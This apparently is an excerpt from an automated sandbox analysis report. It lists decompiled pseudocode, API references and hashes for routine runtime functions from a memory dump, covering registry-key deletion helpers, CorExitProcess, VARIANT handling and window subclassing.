Instruction ID: 1f03f4485f672a3aed6ac9f0d979b78fba3bbc07c2a40efe7f774187ad9ca3e9
Opcode Fuzzy Hash: e8d96c52a0aeb30db5e821df0aa43a8adb1f5184fc487dc7a990afd930e69c73
Instruction Fuzzy Hash: 6BF04F32144205BFCF312F92ED08EAB7F69EB98B51B008429F95591030DB729961FB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2590, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CB2590(void** __ecx, char* _a4) {
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t9;

				_t13 = __ecx;
				_t12 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					if( *0xe3a434 != 0) {
						_t6 =  *0xe3a3f8; // 0x0
					} else {
						_t9 = GetModuleHandleA("Advapi32.dll");
						if(_t9 == 0) {
							_t6 =  *0xe3a3f8; // 0x0
						} else {
							_t6 = GetProcAddress(_t9, "RegDeleteKeyExA");
							 *0xe3a3f8 = _t6;
						}
						 *0xe3a434 = 1;
					}
					if(_t6 == 0) {
						return RegDeleteKeyA( *_t13, _a4);
					} else {
						return  *_t6( *_t13, _a4, _t13[1], 0);
					}
				}
				return E00CB2177(_t12,  *((intOrPtr*)(__ecx)), _a4);
			}

0x00cb2594
0x00cb2596
0x00cb259b
0x00cb25b0
0x00cb25e2
0x00cb25b2
0x00cb25b7
0x00cb25bf
0x00cb25d4
0x00cb25c1
0x00cb25c7
0x00cb25cd
0x00cb25cd
0x00cb25d9
0x00cb25d9
0x00cb25e9
0x00000000
0x00cb25eb
0x00000000
0x00cb25f5
0x00cb25e9
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00CB25B7
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00CB25C7

Part of subcall function 00CB2177: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00CB2189
Part of subcall function 00CB2177: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00CB2199

Strings

Advapi32.dll, xrefs: 00CB25B2
RegDeleteKeyExA, xrefs: 00CB25C1

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExA
API String ID: 1646373207-1984814126
Opcode ID: 284bb3446e96ee82952c63ae2934cc77e0e20f7cc402259facbb17666c51bdba
Instruction ID: 83d9e84df8b4d6d22f9c27a8199548bb2e00960c4571cff2a79ca39cede879b8
Opcode Fuzzy Hash: 284bb3446e96ee82952c63ae2934cc77e0e20f7cc402259facbb17666c51bdba
Instruction Fuzzy Hash: F701FD34208308EFDB301F52EC48FE93FA8EB14780F040428F096920B0CB7199E8EB12

Uniqueness

Uniqueness Score: -1.00%

Function 00CDD5FC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00CDD5FC(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xcfe638(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00cdd602
0x00cdd606
0x00cdd611
0x00cdd619
0x00cdd624
0x00cdd62a
0x00cdd62e
0x00cdd635
0x00cdd63b
0x00cdd63b
0x00cdd63d
0x00cdd642
0x00000000
0x00cdd647
0x00cdd650

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00CDD583,?,?,00CDD54B,?,?,?), ref: 00CDD611
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CDD624
FreeLibrary.KERNEL32(00000000,?,?,00CDD583,?,?,00CDD54B,?,?,?), ref: 00CDD647

Strings

mscoree.dll, xrefs: 00CDD60A
CorExitProcess, xrefs: 00CDD61C

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ea7dff3cf559fb9acdffe8b49b3e3faeb65c06e89a67141b77b4775901e3c691
Instruction ID: 6dff215254a3576fd4424871c20433e10b4a92e6aab3f8ff87fbefacc88a0353
Opcode Fuzzy Hash: ea7dff3cf559fb9acdffe8b49b3e3faeb65c06e89a67141b77b4775901e3c691
Instruction Fuzzy Hash: A0F0EC3090021CFBDB119B91CC09BAEBB69EF00712F100068F809A22B0CB318F00DAE6

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5AF0, Relevance: 7.7, APIs: 5, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00CB5AF0(intOrPtr* __ecx, signed int __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v28;
				char _v36;
				char _v40;
				intOrPtr* _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t62;
				signed int _t64;
				signed int _t74;
				signed int _t80;
				intOrPtr* _t92;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				intOrPtr* _t101;
				signed int _t109;
				intOrPtr* _t110;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t120;
				void* _t122;

				_t122 = (_t120 & 0xfffffff8) - 0x34;
				_v44 = __ecx;
				_v40 = __edx;
				if(__ecx == 0 || __edx == 0 || _a4 == 0 || _a8 == 0) {
					_t62 = 0x80070057;
				} else {
					_push( &_v52);
					_push(4);
					_t106 =  &_v28;
					_push( &_v28);
					_push(__ecx);
					_v52 = 0;
					_t62 =  *((intOrPtr*)( *__ecx + 0xc))();
					_t118 = _t62;
					if(_t118 >= 0) {
						if(_v68 != 4 || _v44 > 0xe00) {
							_t62 = 0x80004005;
						} else {
							_t64 = 0;
							_v72 = 0;
							_v48 = 0;
							_v64 = 0;
							if( *((intOrPtr*)(__edx + 4)) != 0) {
								_t114 = __edx;
								_t92 = __imp__#9;
								_t96 = __edx;
								L9:
								while(1) {
									if( *_t114 == 0) {
										L27:
										_t64 = _t64 + 1;
										_v64 = _t64;
										_t114 = _t64 * 0x24 + _t96;
										if( *((intOrPtr*)(_t114 + 4)) != 0) {
											continue;
										}
									} else {
										if( *((intOrPtr*)(_t114 + 0x1c)) == 0) {
											E00CC1E00(_t114,  &_v36, 0, 0x10);
											_t122 = _t122 + 0xc;
											__imp__#8( &_v36);
											_push( *((intOrPtr*)(_t114 + 0x10)));
											_push( *((intOrPtr*)(_t114 + 0xc)));
											_push( *(_t114 + 0x20) & 0x0000ffff);
											_push(_v64);
											_t118 = E00CB1C30(_t92,  &_v40, _t106, _t114, __eflags);
											__eflags = _t118;
											if(_t118 < 0) {
												L30:
												_push( &_v56);
												goto L31;
											} else {
												_t98 =  *(_t114 + 8);
												__eflags = _t98 - _v68;
												if(_t98 == _v68) {
													L24:
													_t106 =  *((intOrPtr*)(_t114 + 0x14));
													_t74 = E00CB164D(_v92,  *((intOrPtr*)(_t114 + 0x14)),  &_v56);
													__eflags = _t74;
													_push( &_v56);
													if(_t74 < 0) {
														_t118 = 0x80004005;
														L31:
														 *_t92();
													} else {
														 *_t92();
														goto L26;
													}
												} else {
													_t109 = _v92;
													__eflags = _t109;
													if(_t109 != 0) {
														_t42 =  &_v92;
														 *_t42 = _v92 & 0x00000000;
														__eflags =  *_t42;
														 *((intOrPtr*)( *_t109 + 8))(_t109);
														_t98 =  *(_t114 + 8);
													}
													__eflags = _t98;
													if(_t98 == 0) {
														 *_t92( &_v56);
														goto L36;
													} else {
														_t110 = _a8;
														_t80 =  *((intOrPtr*)( *_t110))(_t110, _t98,  &_v92);
														_t92 = __imp__#9;
														__eflags = _t80;
														if(_t80 < 0) {
															_t118 = 0x80004005;
															goto L30;
														} else {
															_v80 =  *(_t114 + 8);
															goto L24;
														}
													}
												}
											}
										} else {
											_t106 =  *((intOrPtr*)(_t114 + 0x18)) + _a4;
											_v40 = _t106;
											if( *(_t114 + 0x20) != 8) {
												_t101 = _v60;
												_t118 =  *((intOrPtr*)( *_t101 + 0xc))(_t101, _t106,  *((intOrPtr*)(_t114 + 0x1c)),  &_v68);
												__eflags = _t118;
												if(_t118 >= 0) {
													__eflags = _v84 -  *((intOrPtr*)(_t114 + 0x1c));
													if(_v84 !=  *((intOrPtr*)(_t114 + 0x1c))) {
														L36:
														_t118 = 0x80004005;
													} else {
														goto L15;
													}
												}
											} else {
												_v52 = _v52 & 0x00000000;
												_t118 = L00CB1865( &_v52, _v60);
												 *_v44 = _v56;
												__imp__#6(0);
												L15:
												if(_t118 >= 0) {
													L26:
													_t64 = _v88;
													_t96 = _v80;
													goto L27;
												}
											}
										}
									}
									goto L32;
								}
							}
							L32:
							_t95 = _v72;
							__eflags = _t95;
							if(_t95 != 0) {
								 *((intOrPtr*)( *_t95 + 8))(_t95);
							}
							_t62 = _t118;
						}
					}
				}
				return _t62;
			}

0x00cb5af6
0x00cb5af9
0x00cb5b00
0x00cb5b08
0x00cb5cf9
0x00cb5b2a
0x00cb5b30
0x00cb5b31
0x00cb5b33
0x00cb5b39
0x00cb5b3a
0x00cb5b3b
0x00cb5b3f
0x00cb5b42
0x00cb5b46
0x00cb5b51
0x00cb5cf2
0x00cb5b65
0x00cb5b65
0x00cb5b67
0x00cb5b6b
0x00cb5b6f
0x00cb5b76
0x00cb5b7c
0x00cb5b7e
0x00cb5b84
0x00000000
0x00cb5b86
0x00cb5b89
0x00cb5caa
0x00cb5caa
0x00cb5cae
0x00cb5cb2
0x00cb5cb8
0x00000000
0x00cb5cba
0x00cb5b8f
0x00cb5b93
0x00cb5c0e
0x00cb5c13
0x00cb5c1b
0x00cb5c21
0x00cb5c2c
0x00cb5c2f
0x00cb5c30
0x00cb5c39
0x00cb5c3b
0x00cb5c3d
0x00cb5cc4
0x00cb5cc8
0x00000000
0x00cb5c43
0x00cb5c43
0x00cb5c46
0x00cb5c4a
0x00cb5c85
0x00cb5c85
0x00cb5c91
0x00cb5c96
0x00cb5c9d
0x00cb5c9e
0x00cb5ceb
0x00cb5cc9
0x00cb5cc9
0x00cb5ca0
0x00cb5ca0
0x00000000
0x00cb5ca0
0x00cb5c4c
0x00cb5c4c
0x00cb5c50
0x00cb5c52
0x00cb5c54
0x00cb5c54
0x00cb5c54
0x00cb5c5c
0x00cb5c5f
0x00cb5c5f
0x00cb5c62
0x00cb5c64
0x00cb5ce2
0x00000000
0x00cb5c66
0x00cb5c66
0x00cb5c72
0x00cb5c74
0x00cb5c7a
0x00cb5c7c
0x00cb5cbf
0x00000000
0x00cb5c7e
0x00cb5c81
0x00000000
0x00cb5c81
0x00cb5c7c
0x00cb5c64
0x00cb5c4a
0x00cb5b95
0x00cb5b98
0x00cb5ba0
0x00cb5ba4
0x00cb5bce
0x00cb5be1
0x00cb5be3
0x00cb5be5
0x00cb5bef
0x00cb5bf2
0x00cb5ce4
0x00cb5ce4
0x00000000
0x00000000
0x00000000
0x00cb5bf2
0x00cb5ba6
0x00cb5baa
0x00cb5bbc
0x00cb5bc4
0x00cb5bc6
0x00cb5bf8
0x00cb5bfa
0x00cb5ca2
0x00cb5ca2
0x00cb5ca6
0x00000000
0x00cb5ca6
0x00cb5bfa
0x00cb5ba4
0x00cb5b93
0x00000000
0x00cb5b89
0x00cb5b86
0x00cb5ccb
0x00cb5ccb
0x00cb5ccf
0x00cb5cd1
0x00cb5cd6
0x00cb5cd6
0x00cb5cd9
0x00cb5cd9
0x00cb5b51
0x00cb5b46
0x00cb5d04

APIs

SysFreeString.OLEAUT32(00000000), ref: 00CB5BC6
VariantInit.OLEAUT32(?), ref: 00CB5C1B

Part of subcall function 00CB1C30: __EH_prolog3.LIBCMT ref: 00CB1C37

VariantClear.OLEAUT32(?), ref: 00CB5CA0
VariantClear.OLEAUT32(?), ref: 00CB5CC9
VariantClear.OLEAUT32(?), ref: 00CB5CE2

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Clear$FreeH_prolog3InitString
String ID:
API String ID: 91269424-0
Opcode ID: d0a56a698854f59656b16795b02cee9d31575a8b4ebeaa30ed53ec5d4087d4cd
Instruction ID: 549d7ebd0cb97c39ae961aeec2317435e2e0ebbc73a34e5dfd9f6ed6ce93ba37
Opcode Fuzzy Hash: d0a56a698854f59656b16795b02cee9d31575a8b4ebeaa30ed53ec5d4087d4cd
Instruction Fuzzy Hash: 7E517D71604B02EFC714DF55C884BAABBE6BF88714F048A1DF9559B250D731ED44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CB8E9F, Relevance: 7.7, APIs: 5, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00CB8E9F(signed int _a4, signed int* _a8) {
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v60;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t53;
				signed int _t55;
				intOrPtr _t74;
				signed int _t75;
				signed int _t77;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int* _t87;
				signed int _t88;
				signed int _t92;
				signed int _t93;
				signed int _t98;
				signed int* _t99;
				signed int _t102;
				signed int _t104;
				void* _t106;

				_t106 = (_t104 & 0xfffffff8) - 0x2c;
				_t88 = 0;
				_t102 = 0;
				asm("sbb edi, edi");
				_t98 =  ~_a4 & _a4 - 0x00000070;
				if(_a8 != 0) {
					_t53 = 0;
					_v48 = 4;
					_v40 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					__eflags =  *0xd07c44 - _t53; // 0xcfe6b0
					if(__eflags == 0) {
						L26:
						_t77 = _v48;
						L27:
						_t99 = _a8;
						 *_t99 = _t77;
						_t99[1] = _v40;
						L28:
						_t80 = _v44;
						__eflags = _t80;
						if(_t80 != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						_t55 = _t102;
						L31:
						return _t55;
					}
					_t79 = 0;
					do {
						asm("xorps xmm0, xmm0");
						asm("movlpd [esp+0x20], xmm0");
						__eflags =  *((intOrPtr*)(_t79 + 0xd07c40)) - _t88;
						if( *((intOrPtr*)(_t79 + 0xd07c40)) == _t88) {
							goto L24;
						}
						_t10 = _t79 + 0xd07c5c; // 0x4
						_t81 =  *_t10;
						__eflags = _t81;
						if(_t81 == 0) {
							E00CC1E00(_t98,  &_v20, _t88, 0x10);
							_t106 = _t106 + 0xc;
							__imp__#8( &_v20);
							_t17 = _t79 + 0xd07c48; // 0x0
							_t82 =  *_t17;
							__eflags = _t82 - _v40;
							if(_t82 == _v40) {
								L17:
								_t27 = _t79 + 0xd07c54; // 0x0
								_t90 =  *_t27;
								_t102 = E00CB16DF(_v48,  *_t27,  &_v24);
								__eflags = _t102;
								if(__eflags < 0) {
									L32:
									__imp__#9( &_v24);
									goto L26;
								}
								_t102 = E00CB1DBA(_t79,  &_v24, _t90, _t98, __eflags);
								__imp__#9( &_v28,  &_v32);
								__eflags = _t102;
								if(_t102 < 0) {
									goto L26;
								}
								_t81 = _v40;
								L20:
								_t77 = _v60;
								_t92 =  !_t77;
								__eflags =  !_v52 - _v36;
								if(__eflags < 0) {
									L35:
									_t102 = 0x80070216;
									goto L27;
								}
								if(__eflags > 0) {
									L23:
									_v60 = _v60 + _t81;
									asm("adc ecx, [esp+0x24]");
									_t88 = 0;
									__eflags = 0;
									_t53 = _v44;
									goto L24;
								}
								__eflags = _t92 - _t81;
								if(_t92 < _t81) {
									goto L35;
								}
								goto L23;
							}
							_t93 = _v48;
							__eflags = _t93;
							if(_t93 != 0) {
								_t20 =  &_v48;
								 *_t20 = _v48 & 0x00000000;
								__eflags =  *_t20;
								 *((intOrPtr*)( *_t93 + 8))(_t93);
								_t23 = _t79 + 0xd07c48; // 0x0
								_t82 =  *_t23;
							}
							__eflags = _t82;
							if(_t82 == 0) {
								__imp__#9( &_v24);
								L34:
								_t102 = 0x80004005;
								goto L28;
							} else {
								_t102 =  *((intOrPtr*)( *_t98))(_t98, _t82,  &_v48);
								__eflags = _t102;
								if(_t102 < 0) {
									goto L32;
								}
								_t25 = _t79 + 0xd07c48; // 0x0
								_v52 =  *_t25;
								goto L17;
							}
						}
						__eflags =  *((short*)(_t79 + 0xd07c60)) - 8;
						if( *((short*)(_t79 + 0xd07c60)) != 8) {
							goto L20;
						}
						_t12 = _t79 + 0xd07c58; // 0x28
						_t74 =  *_t12;
						_t87 = _t74 + _t98;
						__eflags = _t87 - _t74;
						if(_t87 < _t74) {
							goto L34;
						}
						__eflags = _t87 - _t98;
						if(_t87 < _t98) {
							goto L34;
						}
						_t75 =  *_t87;
						_t81 = 4;
						__eflags = _t75;
						if(_t75 != 0) {
							__imp__#149(_t75);
							_t14 = _t75 + 6; // 0x6
							_t81 = _t14;
						}
						goto L20;
						L24:
						_t53 = _t53 + 1;
						_t79 = _t53 * 0x24;
						_v32 = _t53;
						__eflags =  *((intOrPtr*)(_t79 + 0xd07c44)) - _t88;
					} while ( *((intOrPtr*)(_t79 + 0xd07c44)) != _t88);
					_t102 = _t88;
					goto L26;
				}
				_t55 = 0x80004003;
				goto L31;
			}

0x00cb8ea5
0x00cb8ea8
0x00cb8eb0
0x00cb8eb7
0x00cb8eb9
0x00cb8ebe
0x00cb8eca
0x00cb8ecc
0x00cb8ed4
0x00cb8ed8
0x00cb8edc
0x00cb8ee0
0x00cb8ee4
0x00cb8eea
0x00cb9043
0x00cb9043
0x00cb9047
0x00cb9047
0x00cb904e
0x00cb9050
0x00cb9053
0x00cb9053
0x00cb9057
0x00cb9059
0x00cb905e
0x00cb905e
0x00cb9061
0x00cb9063
0x00cb9069
0x00cb9069
0x00cb8ef0
0x00cb8ef2
0x00cb8ef2
0x00cb8ef5
0x00cb8efb
0x00cb8f01
0x00000000
0x00000000
0x00cb8f07
0x00cb8f07
0x00cb8f0d
0x00cb8f0f
0x00cb8f5c
0x00cb8f61
0x00cb8f69
0x00cb8f6f
0x00cb8f6f
0x00cb8f75
0x00cb8f79
0x00cb8fbb
0x00cb8fbb
0x00cb8fbb
0x00cb8fcf
0x00cb8fd2
0x00cb8fd4
0x00cb906c
0x00cb9071
0x00000000
0x00cb9071
0x00cb8fe8
0x00cb8fef
0x00cb8ff5
0x00cb8ff7
0x00000000
0x00000000
0x00cb8ff9
0x00cb8ffd
0x00cb9001
0x00cb9009
0x00cb900b
0x00cb900f
0x00cb908b
0x00cb908b
0x00000000
0x00cb908b
0x00cb9011
0x00cb9017
0x00cb9017
0x00cb901f
0x00cb9023
0x00cb9023
0x00cb9025
0x00000000
0x00cb9029
0x00cb9013
0x00cb9015
0x00000000
0x00000000
0x00000000
0x00cb9015
0x00cb8f7b
0x00cb8f7f
0x00cb8f81
0x00cb8f83
0x00cb8f83
0x00cb8f83
0x00cb8f8b
0x00cb8f8e
0x00cb8f8e
0x00cb8f8e
0x00cb8f94
0x00cb8f96
0x00cb907e
0x00cb9084
0x00cb9084
0x00000000
0x00cb8f9c
0x00cb8fa7
0x00cb8fa9
0x00cb8fab
0x00000000
0x00000000
0x00cb8fb1
0x00cb8fb7
0x00000000
0x00cb8fb7
0x00cb8f96
0x00cb8f11
0x00cb8f19
0x00000000
0x00000000
0x00cb8f1f
0x00cb8f1f
0x00cb8f25
0x00cb8f28
0x00cb8f2a
0x00000000
0x00000000
0x00cb8f30
0x00cb8f32
0x00000000
0x00000000
0x00cb8f38
0x00cb8f3c
0x00cb8f3d
0x00cb8f3f
0x00cb8f46
0x00cb8f4c
0x00cb8f4c
0x00cb8f4c
0x00000000
0x00cb902d
0x00cb902d
0x00cb902e
0x00cb9031
0x00cb9035
0x00cb9035
0x00cb9041
0x00000000
0x00cb9041
0x00cb8ec0
0x00000000

APIs

SysStringByteLen.OLEAUT32(00000028), ref: 00CB8F46
VariantClear.OLEAUT32(?), ref: 00CB9071
VariantClear.OLEAUT32(?), ref: 00CB907E

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant$ByteString
String ID:
API String ID: 3891396083-0
Opcode ID: 5b3f482cf0b4b31ad880ae7057c13e5c2edd27f808c1c18a5f703ab24b5374b1
Instruction ID: 34e2a10dd38ee6c6804e90c7a9fb1b0bd5f822aa554b913440e6ba559a1da6d8
Opcode Fuzzy Hash: 5b3f482cf0b4b31ad880ae7057c13e5c2edd27f808c1c18a5f703ab24b5374b1
Instruction Fuzzy Hash: 8B51A571A083028FCB14DF65D484AAAB7E9FFCC710F14896DF9599B211DB31E944CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1DBA, Relevance: 7.6, APIs: 5, Instructions: 112COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CB1DC1
VariantInit.OLEAUT32(?), ref: 00CB1ED2
VariantChangeType.OLEAUT32(?,?,00000001,00000008), ref: 00CB1EEE
SysStringByteLen.OLEAUT32(?), ref: 00CB1F22
VariantClear.OLEAUT32(?), ref: 00CB1F35

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ByteChangeClearH_prolog3InitStringType
String ID:
API String ID: 3390743815-0
Opcode ID: 57600bfa82055d670a04ec43a731ee8a75eeaa6c998d1c7bc0a56271f870ed9a
Instruction ID: 52d2bf54463b217feca56105595c41f6b8dc584cd71007ec560a1181ee292795
Opcode Fuzzy Hash: 57600bfa82055d670a04ec43a731ee8a75eeaa6c998d1c7bc0a56271f870ed9a
Instruction Fuzzy Hash: F031AD71A002059FDB14DBE4D8A9FFE7779AF44710FA84129FA05AB290DB709E41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBADF2, Relevance: 7.6, APIs: 5, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00CBADF2(void* __ecx, void* __eflags, long _a4, signed int _a8, int _a12, long _a16) {
				long _v8;
				char _v44;
				signed int _t53;
				long _t59;
				long _t60;
				signed int _t64;
				signed int _t67;
				_Unknown_base(*)()* _t69;
				int _t71;
				intOrPtr* _t73;

				_t73 = _a4;
				_t71 = _a8;
				_t64 =  &_v44;
				E00CB5F36(_t64,  *(_t73 + 4), _t71, _a12, _a16);
				_a4 = _a4 & 0x00000000;
				_push(0);
				_a8 =  *(_t73 + 0x18);
				 *(_t73 + 0x18) = _t64;
				_push( &_a4);
				_push(_a16);
				_push(_a12);
				_push(_t71);
				_push( *(_t73 + 4));
				if( *((intOrPtr*)( *_t73))() == 0) {
					if(_t71 == 0x82) {
						_v8 = GetWindowLongA( *(_t73 + 4), 0xfffffffc);
						_t59 = CallWindowProcA( *(_t73 + 0x20),  *(_t73 + 4), 0x82, _a12, _a16);
						_t69 =  *(_t73 + 0x20);
						_a4 = _t59;
						__eflags = _t69 - __imp__DefWindowProcA; // 0x7765d1c0
						if(__eflags != 0) {
							_t60 = GetWindowLongA( *(_t73 + 4), 0xfffffffc);
							__eflags = _t60 - _v8;
							if(_t60 == _v8) {
								SetWindowLongA( *(_t73 + 4), 0xfffffffc,  *(_t73 + 0x20));
							}
						}
						_t33 = _t73 + 0x1c;
						 *_t33 =  *(_t73 + 0x1c) | 0x00000001;
						__eflags =  *_t33;
					} else {
						_a4 = CallWindowProcA( *(_t73 + 0x20),  *(_t73 + 4), _t71, _a12, _a16);
					}
				}
				_t53 =  *(_t73 + 0x1c);
				_t67 = _a8;
				if((_t53 & 0x00000001) == 0 || _t67 != 0) {
					 *(_t73 + 0x18) = _t67;
				} else {
					 *(_t73 + 4) =  *(_t73 + 4) & _t67;
					 *(_t73 + 0x18) =  *(_t73 + 0x18) & _t67;
					 *(_t73 + 0x1c) = _t53 & 0xfffffffe;
					 *((intOrPtr*)( *_t73 + 0xc))( *(_t73 + 4));
				}
				return _a4;
			}

0x00cbadf9
0x00cbadfd
0x00cbae04
0x00cbae0e
0x00cbae16
0x00cbae1a
0x00cbae1c
0x00cbae24
0x00cbae29
0x00cbae2a
0x00cbae2f
0x00cbae32
0x00cbae33
0x00cbae3a
0x00cbae42
0x00cbae6c
0x00cbae7d
0x00cbae83
0x00cbae86
0x00cbae89
0x00cbae8f
0x00cbae96
0x00cbae98
0x00cbae9b
0x00cbaea5
0x00cbaea5
0x00cbae9b
0x00cbaeab
0x00cbaeab
0x00cbaeab
0x00cbae44
0x00cbae57
0x00cbae57
0x00cbae42
0x00cbaeaf
0x00cbaeb2
0x00cbaeb7
0x00cbaed6
0x00cbaebd
0x00cbaec3
0x00cbaec6
0x00cbaecb
0x00cbaed1
0x00cbaed1
0x00cbaedf

APIs

CallWindowProcA.USER32 ref: 00CBAE51
GetWindowLongA.USER32 ref: 00CBAE67
CallWindowProcA.USER32 ref: 00CBAE7D
GetWindowLongA.USER32 ref: 00CBAE96
SetWindowLongA.USER32(?,000000FC,?), ref: 00CBAEA5

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID:
API String ID: 513923721-0
Opcode ID: c18f195a38b4ee958d0afdc118871d627c2dc74ca73ca704f598a2747faca0db
Instruction ID: 8750387a4d863acf2dbbde2297e7b3b16d1ab4af280d4c04fde51fc906ce8092
Opcode Fuzzy Hash: c18f195a38b4ee958d0afdc118871d627c2dc74ca73ca704f598a2747faca0db
